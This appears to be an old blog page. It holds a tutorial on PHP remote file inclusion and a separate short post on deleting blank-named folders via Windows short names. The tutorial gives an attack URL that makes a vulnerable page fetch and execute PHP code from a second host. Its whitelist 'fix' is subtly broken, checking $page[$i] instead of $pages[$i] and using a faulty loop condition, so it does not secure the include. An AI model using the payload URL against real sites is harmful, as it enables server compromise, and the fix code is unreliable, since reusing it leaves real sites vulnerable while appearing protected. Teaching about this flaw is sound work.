What is Code Injection and How to Prevent It

There has been a sudden increase of attacks on sites that have Code Injection vulnerabilities. Code Injection is a term used when code is injected straight into a program/script from an outside source for execution at some point in time. These type of vulnerabilities may be many times worse than any other vulnerability, since the security of the web site, and possibly of the server, is compromised.

Example:

This example will help you understand what exactly a Code Injection Vulnerability looks like in it’s simplest form, and unfortunately, this snippet is actually used in quite a few web sites.

HTML header

<?php
include (‘$page’);
?>

HTML footer

Note: There is no php code in the header or footer, it is just HTML.

To some, this is obviously a big mistake. The ‘$page’ variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?

Example Exploit:

An attacker can create a ‘txt’ file on another server and have it included in the above example. If the attacker puts php code in this ‘txt’ file, it will be executed on the exploited host.

<?php
phpinfo();
?>

Let’s say the vulnerable code is located at ‘http://domain/index.php’, and the ‘txt’ file is located at ‘http://domain2/code.txt’, then the attacker would enter something like this into his browser:

http://domain/index.php?page=http://domain2/code.txt

Then end result would have the exploited web site execute the command ‘phpinfo()’ in between the header and footer where the php include is located.

Explanation:

If you had no problem understanding why this would happen, feel free to skip this section.

The ‘include()’ function takes data from another file, that is defined in the brackets (), and places the data in the area that the include is executed. So let us run through the program in our minds, and assume the url mentioned above is entered into a browser. In the url, it defines the variable $page as containing ‘http://domain2/code.txt’, so let us replaces all $page variables with this string:

HTML header

<?php
include (‘http://domain2/code.txt‘);
?>

HTML footer

Now the include function takes the code from the url/file mentioned, and places it where the include was called, so the result would be:

HTML header

<?php
phpinfo();
?>

HTML footer

Now this is what the server ends up processing. What happens here is the header is displayed, then the php command; ‘phpinfo()’ is executed, followed by the footer at the end.

What can happen:

The above example had harmless code being executed, but the attacker can execute more malicious code.

  • An attacker can output the contents of any php file raw to the browser, where he can possibly obtain an SQL login/password to your database.
  • An attacker can use your web site to send out large amounts of spam to various email addresses.
  • An attacker can deface your web site.
  • An attacker can obtain private information.
  • An attacker may gain access to the whole server.

This is why it is important to secure your web site, and not leave such vulnerabilities open for attack.

Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.

HTML header

<?php
//list of valid pages
$pages=array(“games/index.html”, “news/news.html”, “games/1.html”);

//check $page variable
$valid=false;
for ($i=0; $i<sizeof($pages) || !$valid; $i++) {
if ($page==$page[$i]) {
$valid=true;
}
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

HTML footer

Another Solution:

Another solution is to check for invalid characters and setup all the page files in a separate directory, all together.

Example of where the pages are placed:

  • pages/games.html
  • pages/news.html
  • pages/games-1.html

Code:

HTML header

<?php
$invalidChars=array(“/”,”.”,”\\”,”\””,”;”);
$page=str_replace($invalidChars,””,$page);
include (“pages/”.$page.”.html”);
?>

HTML footer

Remove Filename and Directories that have no name

Operating an open ftp server can be a risky ordeal, expecially if anonymous users may upload files to it. There are people out there that scan blocks of ips for such open servers and may use it to store illegal software, some of who may use tricky folder names such as ‘ ‘ (space). This quick article will explain how to remove such a folder/file on a Windows machine.

1. Empty out the folder in question (if it is a folder). You should be able to do this with explorer
2. Open ‘Command Prompt’ by:
clicking ‘Start’ -> click ‘Run’ -> type ‘cmd’ (without the quotes) -> hit the ‘Enter’ key
3. Navigate through the command prompt to the folder containing the offending folder/file.

If the path of the offending folder/file is “C:\path\to\folder\” then you can type: “cd \path\to\folder\” and hit ‘Enter’.

4. Find the short name for the folder/file by using the command ‘dir’ with the parameter /x.

For example

dir /x

Example of a short name:

0200~1
5. Use this short name to remove the folder/file.

If it is a file with the short name ‘0200~1’:

del 0200~1

If it is a folder with the short name ‘0200~1’:

rmdir 0200~1